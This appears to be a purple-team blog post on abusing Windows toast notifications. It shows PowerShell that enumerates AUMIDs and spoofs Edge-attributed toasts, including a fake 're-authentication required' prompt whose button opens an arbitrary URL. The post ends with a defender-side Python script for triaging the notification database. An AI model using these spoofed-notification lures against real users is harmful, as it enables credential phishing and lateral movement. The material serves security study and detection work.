- What: Threat actors can use Windows toast notifications for social engineering attacks
- Impact: Users may be tricked into revealing credentials or performing actions that lead to lateral movement
The Application User Model ID (AUMID) is a unique identifier that Windows assigns to modern applications. It lets Windows determine which application should receive a notification, how Start menu entries are associated, how toast notifications map back to an application, and so on. Many organizations use toast notifications to push internal updates to endpoints, such as IT announcements, new policy rollouts, password-expiry warnings and VPN reminders. Threat actors could use toast notifications to social engineer users into performing an action that leads to credential harvesting or lateral movement.

Playbook

Toast notifications have been weaponized since the early days of Windows 8.1. Specifically, Fox-IT released a PowerShell script called Invoke-CredentialPhisher that could display different toast notifications to social engineer the user who has an interactive session. However, due to operating system changes in newer versions of Windows, the script no longer works. Marco, a security researcher, has released a beacon object file supplemented with PowerShell snippets that can be used to run multiple scenarios that manipulate the user into clicking arbitrary links and performing actions. Scenarios using toast notifications can be highly effective because trusted applications are involved, making it difficult for users to identify notifications that have malicious intent.
Enumeration of the Application User Model IDs registered on the system can be achieved by querying the Start menu applications:

```powershell
# AUMIDs of Start menu apps (UWP/packaged apps) via the StartLayout module cmdlet
$uwp = Get-StartApps | Select-Object -ExpandProperty AppID

# AUMIDs that desktop apps advertise through the System.AppUserModel.ID
# property of their Start menu shortcuts (.lnk)
$lnk = & {
    $paths = @(
        "$env:APPDATA\Microsoft\Windows\Start Menu\Programs",
        "$env:ProgramData\Microsoft\Windows\Start Menu\Programs"
    )
    $shell = New-Object -ComObject Shell.Application
    foreach ($path in $paths) {
        Get-ChildItem $path -Recurse -Filter *.lnk -ErrorAction SilentlyContinue | ForEach-Object {
            $folder = $shell.Namespace($_.DirectoryName)
            $item   = $folder.ParseName($_.Name)
            $item.ExtendedProperty("System.AppUserModel.ID")
        }
    }
}

# Merge both lists, drop empty values and de-duplicate
($uwp + $lnk) | Where-Object { $_ } | Sort-Object -Unique
```

AUMID Enumeration – PowerShell Script

AUMID Enumeration

Alternatively, there is a PowerShell cmdlet that can be used to enumerate all installed AppX packages (Universal Windows Platform and MSIX-packaged Win32 apps).

```powershell
# A packaged app's AUMID is "<PackageFamilyName>!<ApplicationId from the manifest>"
Get-AppxPackage | Select-Object Name, PackageFamilyName
```

AUMID Enumeration

The third option is to query the registry keys that store notification-capable applications.

```powershell
$notificationPaths = @(
    "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings",
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings"
)
# Each subkey under Notifications\Settings is named after the AUMID of an app
# that has per-app notification settings
$registeredApps = foreach ($path in $notificationPaths) {
    if (Test-Path $path) {
        Get-ChildItem $path | Select-Object -ExpandProperty PSChildName
    }
}
$registeredApps | Sort-Object -Unique
```

AUMID Enumeration – Registry

The script below loads WinRT types into PowerShell, defines the Application User Model ID (AUMID), builds the toast XML, loads the XML into a WinRT XML document, creates the toast notification object and finally creates the notifier for the chosen AUMID. The command `$notifier.Show($toast)` displays the notification.
```powershell
# Load the WinRT projections needed for toast notifications
Add-Type -AssemblyName System.Runtime.WindowsRuntime
[Windows.UI.Notifications.ToastNotificationManager,Windows.UI.Notifications,ContentType=WindowsRuntime] | Out-Null
[Windows.Data.Xml.Dom.XmlDocument,Windows.Data.Xml.Dom.XmlDocument,ContentType=WindowsRuntime] | Out-Null

$AUMID = "MSEdge"  # the AUMID string the toast will be attributed to

# Toast content using the ToastGeneric template
$xml = @"
<toast>
  <visual>
    <binding template="ToastGeneric">
      <text>Windows Update</text>
      <text>Visit ipurple.team</text>
    </binding>
  </visual>
</toast>
"@

$doc = New-Object Windows.Data.Xml.Dom.XmlDocument
$doc.LoadXml($xml)
$toast    = [Windows.UI.Notifications.ToastNotification]::new($doc)
$notifier = [Windows.UI.Notifications.ToastNotificationManager]::CreateToastNotifier($AUMID)
$notifier.Show($toast)
```

MS Edge Notification

An alternative scenario is to use an application such as Edge to coerce the user into re-authenticating and supplying credentials, or to use a button that takes the user to an arbitrary URL.

```powershell
# Load the WinRT projections needed for toast notifications
Add-Type -AssemblyName System.Runtime.WindowsRuntime
[Windows.UI.Notifications.ToastNotificationManager,Windows.UI.Notifications,ContentType=WindowsRuntime] | Out-Null
[Windows.Data.Xml.Dom.XmlDocument,Windows.Data.Xml.Dom.XmlDocument,ContentType=WindowsRuntime] | Out-Null

$AUMID = "MSEdge"  # the AUMID string the toast will be attributed to

# The <actions> element adds a button; activationType="protocol" makes Windows
# launch the URL in "arguments" through its protocol handler when clicked
$xml = @"
<toast>
  <visual>
    <binding template="ToastGeneric">
      <text>Action Required</text>
      <text>Your session requires re-authentication. Click to continue.</text>
    </binding>
  </visual>
  <actions>
    <action content="Continue" activationType="protocol" arguments="https://ipurple.team"/>
  </actions>
</toast>
"@

$doc = New-Object Windows.Data.Xml.Dom.XmlDocument
$doc.LoadXml($xml)
$toast    = [Windows.UI.Notifications.ToastNotification]::new($doc)
$notifier = [Windows.UI.Notifications.ToastNotificationManager]::CreateToastNotifier($AUMID)
$notifier.Show($toast)
```

MS Edge Notification Button ipurple.team

It is also possible to abuse the Microsoft Teams AUMID to impersonate...
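Added example, not code from the original post: a defender-side triage script for the toast history Windows keeps in `%LOCALAPPDATA%\Microsoft\Windows\Notifications\wpndatabase.db`, where the Notification table stores each toast's XML payload and links, via HandlerId, to the NotificationHandler row whose PrimaryId is the AUMID the toast was shown as. It flags the two traits of the scenarios above (re-authentication lure wording and a protocol button pointing outside an allow-list). The allow-list, the reduced two-table schema and the sample rows are assumptions constructed for the example; check column names against your own database image.

```python
import sqlite3
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

ALLOWED_HOSTS = {"intranet.corp.example", "login.microsoftonline.com"}  # assumed allow-list
LURE_WORDS = ("re-authenticat", "credential", "password", "action required")  # lure wording from the page


def analyse_payload(aumid, payload):
    """Return findings for one stored toast; an empty list means nothing was flagged."""
    if isinstance(payload, bytes):  # wpndatabase.db stores Payload as a BLOB of XML
        payload = payload.decode("utf-8", "replace")
    try:
        root = ET.fromstring(payload)
    except ET.ParseError:
        return ["unparseable toast XML"]
    text = " ".join(t.text or "" for t in root.iter("text")).lower()
    findings = [f"lure wording shown as {aumid}"] if any(w in text for w in LURE_WORDS) else []
    for action in root.iter("action"):
        if action.get("activationType") != "protocol":
            continue  # foreground/background activations stay inside the app
        host = urlparse(action.get("arguments", "")).hostname or ""
        if host not in ALLOWED_HOSTS:
            findings.append(f"button opens unapproved host {host!r} as {aumid}")
    return findings


def triage(con):
    """Join each Notification row to its handler's AUMID (PrimaryId) and analyse the payload."""
    rows = con.execute(
        "SELECT n.Id, h.PrimaryId, n.Payload FROM Notification AS n "
        "JOIN NotificationHandler AS h ON h.RecordId = n.HandlerId"
    )
    return {nid: analyse_payload(aumid, payload) for nid, aumid, payload in rows}


def build_sample_db():
    """Constructed in-memory stand-in for wpndatabase.db, reduced to the columns used above."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE NotificationHandler (RecordId INTEGER PRIMARY KEY, PrimaryId TEXT);"
        "CREATE TABLE Notification (Id INTEGER PRIMARY KEY, HandlerId INTEGER, Payload BLOB);"
    )
    con.execute("INSERT INTO NotificationHandler VALUES (1, 'MSEdge')")
    benign = b"<toast><visual><binding template='ToastGeneric'><text>Download complete</text></binding></visual></toast>"
    lure = (b"<toast><visual><binding template='ToastGeneric'><text>Action Required</text>"
            b"<text>Your session requires re-authentication. Click to continue.</text></binding></visual>"
            b"<actions><action content='Continue' activationType='protocol' arguments='https://ipurple.team'/></actions></toast>")
    con.executemany("INSERT INTO Notification VALUES (?, 1, ?)", [(1, benign), (2, lure)])
    return con
```

Run `triage(build_sample_db())` to see the benign toast come back clean and the lure toast flagged twice; point `sqlite3.connect` at a copied wpndatabase.db to run it over real history.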